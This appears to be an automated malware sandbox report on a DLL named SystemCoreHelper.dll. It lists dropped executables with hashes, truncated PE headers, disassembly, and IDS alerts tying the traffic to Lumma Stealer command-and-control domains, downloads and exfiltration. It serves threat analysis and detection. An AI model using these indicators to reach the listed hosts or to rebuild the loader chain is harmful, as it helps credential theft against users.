                                                                                                                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1Rt+kiE2J5xAIDQbTiQCIFRVRMxTPIt+kiE2J5xAIDQb6x:pAu+H2Lnwkn23fDQ/zxszIwkn23fDQ6
                                                                                                                                                          MD5:9FC0C6FE0D83E7BBFA22689DB8CE21D4
                                                                                                                                                          SHA1:531A71DC7F6D80493ED41CBC938F6474BEB00AEB
                                                                                                                                                          SHA-256:B8F427DA3964F5F43D24129C7D2CF075E976A82A762F415E5F20DB477DC14622
                                                                                                                                                          SHA-512:E661C8A89098A42BD713C10190899D71AE2C2A051A06DD85618C8A6C57711FBD9C5BA917D71E08C1B4A00C6B2C7A19FFE0C01636910B1C555C5D92C15032417C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs"
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6144
                                                                                                                                                          Entropy (8bit):3.8193769713643824
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:HBvCxpv5oxxZza7g+VU5791c4VFekkhB2xHOKiH:hvCxpGxPzac9W2Eq7o
                                                                                                                                                          MD5:93E2D02C5ED637CE7E0C9D7EE9DDE41B
                                                                                                                                                          SHA1:5E2A1D223211FDF264FBBC51EB02555E710F4A7E
                                                                                                                                                          SHA-256:E28D7572629353E0D11536DB39F7D1FE9B7E3903E6FC1E2598DE6B85C822CA76
                                                                                                                                                          SHA-512:00D10962EBECA4BAA77432D05A18E4FD464DFBF76C2FE7B9827CBAA324FB98BCBEBA2E3771E92EB798163425BE4DFC46238AE0B1641686FECECD04371B63F04E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag...........!..................... ...@....... ....................................@..................................-..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H........#..,............................................................0..M.......r...p(....r!..pr%..po....r'..p(....(.....r1..p.r...p(................r...p.........r...p.........r...p...(.....s......o....r...po.....o...............r...p.........r1..p.........r7..p...(....o.....o.....o.....o.....o.....o.....o.....o.....o.....o.....o.....o....&.o.......,..o.....s.........o.......o.......o.......o......(....o....*.........u..........0..........r;..p(....o.....r...p(....o.....
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):681
                                                                                                                                                          Entropy (8bit):5.2536894768185265
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:KJN/qR37LwfcQf8KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdYfff8Kax5DqBVKVrdFAMBJTH
                                                                                                                                                          MD5:47B2D51356086E9692142A2E7D1B3E80
                                                                                                                                                          SHA1:1C39DF01CC247C5BD1437FF0F8C61FD72300CACF
                                                                                                                                                          SHA-256:D9D64FB091F2FA65B6B45F43949EB3AC5BCB3502F5CCE5A0A1E96A210E59C436
                                                                                                                                                          SHA-512:F5F570AC6CFC2C65E66FAA867C14401C5FC3BDA893B9A6DA504AD2CAAFA90F8D657A0382248047AE76252F683266959248C4DD8C8DC1008E5A915B08CA775AAA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                          Process:C:\Windows\Temp\zbjnkzvo4cc.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):462848
                                                                                                                                                          Entropy (8bit):7.1257309071219375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:aklrtKjg1YBxbVonQXhT0doOFdNreYw3ZJyNnFJ/tPZirx1XTY6jyPCMIExFqJoL:DvKjKYBxbVonQXhT0doOFdNreYw3ZJyO
                                                                                                                                                          MD5:EBC77EA19ED66BC10494A862C694C4D7
                                                                                                                                                          SHA1:BB27DD01C052598DE09C5460FE241CB61BE86DE1
                                                                                                                                                          SHA-256:1287FC59877EDEABFCCCDCB48ADCC0D626A12A4F466F496551859ACD5E8E95C2
                                                                                                                                                          SHA-512:32EAE184B9E13D4501226A24C28EB368ED783662358E2642AD210DD7542F6AF66753554F63EB71292A9238EBBDC4B1FC02F6E9C376584DB6B72E100B8C345F81
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: b.exe, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L...q.@g...........!.........v...............................................@............@.............................|.......P............................ ......\...............................x...@...............T............................text............................... ..`.rdata...\.......^..................@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):716800
                                                                                                                                                          Entropy (8bit):7.765253938991967
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:lhQGkvIZqiNSyk5IztFOZNzrn9fgkkAxjFS10dNy81Dtdd9am6wjYJ6OwUkXoK5b:lhQVJuINzrn53px5ndsGrdn6
                                                                                                                                                          MD5:1D08526FC81B1D62195F4E5DEA52BB6F
                                                                                                                                                          SHA1:CAEAA9D75AF4555ECC6367DD32CD541123C5E5B6
                                                                                                                                                          SHA-256:5AF91198860F878466493A6D92481FCC88D59A182CEC02812CE6B3DCD1F0FA38
                                                                                                                                                          SHA-512:0CA26F2932933B4341D21E62873A818AF13F4AB838DA9A5274EBF5C5AA48653F3675EE805232AA31703E99B8ADADEBFF9AF9B78B59158A68E3D792C0D8070C62
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.@g..............0..............`... ... ....@.. ....................................@..................................&..W.... ..@....................@.......................................................`............... ..H...........m.@.k.a.\.... ......................@....text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B.............`...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):716800
                                                                                                                                                          Entropy (8bit):7.765253938991967
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:lhQGkvIZqiNSyk5IztFOZNzrn9fgkkAxjFS10dNy81Dtdd9am6wjYJ6OwUkXoK5b:lhQVJuINzrn53px5ndsGrdn6
                                                                                                                                                          MD5:1D08526FC81B1D62195F4E5DEA52BB6F
                                                                                                                                                          SHA1:CAEAA9D75AF4555ECC6367DD32CD541123C5E5B6
                                                                                                                                                          SHA-256:5AF91198860F878466493A6D92481FCC88D59A182CEC02812CE6B3DCD1F0FA38
                                                                                                                                                          SHA-512:0CA26F2932933B4341D21E62873A818AF13F4AB838DA9A5274EBF5C5AA48653F3675EE805232AA31703E99B8ADADEBFF9AF9B78B59158A68E3D792C0D8070C62
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.@g..............0..............`... ... ....@.. ....................................@..................................&..W.... ..@....................@.......................................................`............... ..H...........m.@.k.a.\.... ......................@....text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B.............`...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                          Entropy (8bit):4.469300489065123
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:IIXfpi67eLPU9skLmb0b45WSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSbB:dXD945WlLZMM6YFH1+B
                                                                                                                                                          MD5:ABD5C669DCAEEB7E4C351A2B47079F5C
                                                                                                                                                          SHA1:1CE022D3867DB84EBFBCF161FE7E941BBA5E9F7A
                                                                                                                                                          SHA-256:A59226716708389192CD912F7DEB33C76A2D050084B41DC60C6FF050A825E3F2
                                                                                                                                                          SHA-512:2EB4D0061D2936F37B04A4D3D39BF264303F9060C0B8902EA6CCA4549E7FB0FF50A55631DDE72BC1D5E9F90EB4D28CE295E80523EA99CEC64EF8D91DB24E112D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.,.u.=...............................................................................................................................................................................................................................................................................................................................................{.A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\Temp\mxtvcgq32fe.exe
                                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):712
                                                                                                                                                          Entropy (8bit):3.6494173204838303
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:ho8FCwprHPQhujczHYdILcdByWdByWdAdDp:O80csvzYIcnnsDp
                                                                                                                                                          MD5:10DB4D9D8C68553567B8633633AC03AB
                                                                                                                                                          SHA1:79A2EC6FC7BAA65E848A0BD4518555FE98496288
                                                                                                                                                          SHA-256:E9D24B97690FDEDE4FF63B87924CF83EC156EF019B36C8286202523254A6DAD4
                                                                                                                                                          SHA-512:1741A46762C8B4AA15EDBBED9A40C448AEA336087FCA8D8F0A72ECD6CCEEECA5622DC6E76D380942B13967CF8AA35F7B3131713C961C82662D429E0D005449A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.Unhandled Exception: System.UnauthorizedAccessException: Access to the path 'C:\Users\user\AppData\Roaming\gdi32.dll' is denied... at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath).. at System.IO.File.InternalDelete(String path, Boolean checkHost).. at System.IO.File.Delete(String path).. at ?????????????????????????????????????????.?????????????????????????????????????????(String ).. at ?????????????????????????????????????????.?????????????????????????????????????????(String ).. at ?????????????????????????????????????????.?????????????????????????????????????????().. at ?????????????????????????????????????????.?????????????????????????????????????????(String[] ).
                                                                                                                                                          File type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Entropy (8bit):4.528272651387934
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80%
                                                                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 44.38%
                                                                                                                                                          • Generic .NET DLL/Assembly (238134/4) 10.55%
                                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.09%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.09%
                                                                                                                                                          File name:SystemCoreHelper.dll
                                                                                                                                                          File size:31'744 bytes
                                                                                                                                                          MD5:319c704031bc817ada8882e1a55b330e
                                                                                                                                                          SHA1:30850826f44f8a70659a7b955ca0d06dd158b22a
                                                                                                                                                          SHA256:832d09109784aa6d472af5e1e93a40d9987fa9d85859c1f803180ed20eb3ac80
                                                                                                                                                          SHA512:68d8a5000c5c67b4f8f26ad0100a3e80535e7ca8dfaa0e91dc6f02f2ec063c5b13f8f2dab0a4edc0477bedc81783225d4f6dd4f055935f41dc9f821789a641a8
                                                                                                                                                          SSDEEP:384:aMb1S7mJMqoA4znLa3yMFDHLl39GHPBjCl507RA6i1bjI/rzi4m6celWPUAp2M:aHbNzmCMdlNEkz6ObsjzW/elWPUAL
                                                                                                                                                          TLSH:78E240683DAA415BD073EF712DEB74C9C99E62D2EE05691A0341CF074D12AB0EE52D3D
                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5g...........!.....n............... ........... ....................................@.............................(..
                                                                                                                                                          Icon Hash:7ae282899bbab082
                                                                                                                                                          Entrypoint:0x10008c2e
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x10000000
                                                                                                                                                          Subsystem:windows cui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x67350D88 [Wed Nov 13 20:35:20 2024 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:4
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:4
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:dae02f32a21e03ce65412f6e56942daa
                                                                                                                                                          Instruction
                                                                                                                                                          jmp dword ptr [10002000h]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0xa0040x28.sdata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8be00x4b.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x408.rsrc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000x18.reloc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                          .text0x20000x6c340x6e008bdd7b176e539d5d765559fa406dace3False0.5095170454545455data4.798914048953818IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                          .sdata0xa0000x4a0x2000910fa1d5163bed4203d413099acb424False0.126953125data0.7287618350542742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .rsrc0xc0000x4080x6009ba6b2a86a0fb9758611dc388411c635False0.255859375data2.3803652684988723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                          .reloc0xe0000x180x200d206e11aca8ed9674a9e38492ee123edFalse0.056640625data0.15517757530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                          RT_VERSION0xc0580x3b0data0.3813559322033898
                                                                                                                                                          DLLImport
                                                                                                                                                          mscoree.dll_CorDllMain
                                                                                                                                                          NameOrdinalAddress
                                                                                                                                                          GetCompiled00x1000205a
                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                          2024-11-23T12:47:13.972120+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449731104.20.3.235443TCP
                                                                                                                                                          2024-11-23T12:47:15.408983+01002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.449734192.81.132.7680TCP
                                                                                                                                                          2024-11-23T12:47:15.408983+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449734192.81.132.7680TCP
                                                                                                                                                          2024-11-23T12:47:15.677699+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449733104.20.3.235443TCP
                                                                                                                                                          2024-11-23T12:47:17.087141+01002018581ET MALWARE Single char EXE direct download likely trojan (multiple families)1192.168.2.449735192.81.132.7680TCP
                                                                                                                                                          2024-11-23T12:47:17.087141+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449735192.81.132.7680TCP
                                                                                                                                                          2024-11-23T12:47:23.653246+01002057646ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz)1192.168.2.4642411.1.1.153UDP
                                                                                                                                                          2024-11-23T12:47:25.179692+01002057647ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI)1192.168.2.449741172.67.184.174443TCP
                                                                                                                                                          2024-11-23T12:47:25.179692+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.184.174443TCP
                                                                                                                                                          2024-11-23T12:47:26.072559+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449741172.67.184.174443TCP
                                                                                                                                                          2024-11-23T12:47:26.072559+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449741172.67.184.174443TCP
                                                                                                                                                          2024-11-23T12:47:27.796297+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:28.497950+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449744104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:28.497950+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:29.882269+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:30.610883+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449747104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:30.610883+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449747104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:32.221521+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:34.437519+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:36.720382+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:39.525155+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:40.236614+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449752104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:41.972082+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754104.21.88.250443TCP
                                                                                                                                                          2024-11-23T12:47:43.665732+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756104.21.88.250443TCP
                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Nov 23, 2024 12:47:10.079432011 CET49730443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:10.079477072 CET44349730104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:10.082109928 CET49730443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:10.112059116 CET49730443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:10.112081051 CET44349730104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:11.350065947 CET44349730104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:11.350142956 CET49730443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:11.356292009 CET49730443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:11.356309891 CET44349730104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:11.356729031 CET44349730104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:11.384210110 CET49730443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:11.431377888 CET44349730104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:12.194892883 CET44349730104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:12.195139885 CET44349730104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:12.195210934 CET49730443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:12.198153019 CET49730443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:12.201183081 CET49731443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:12.201225042 CET44349731104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:12.201364040 CET49731443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:12.201618910 CET49731443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:12.201637030 CET44349731104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:12.295226097 CET49732443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:12.295258999 CET44349732104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:12.295331001 CET49732443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:12.298084021 CET49732443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:12.298098087 CET44349732104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.510802031 CET44349731104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.512953043 CET49731443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.513015032 CET44349731104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.516566038 CET44349732104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.516669989 CET49732443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.518117905 CET49732443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.518124104 CET44349732104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.519072056 CET44349732104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.525757074 CET49732443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.571326971 CET44349732104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.956244946 CET44349732104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.956473112 CET44349732104.20.3.235192.168.2.4
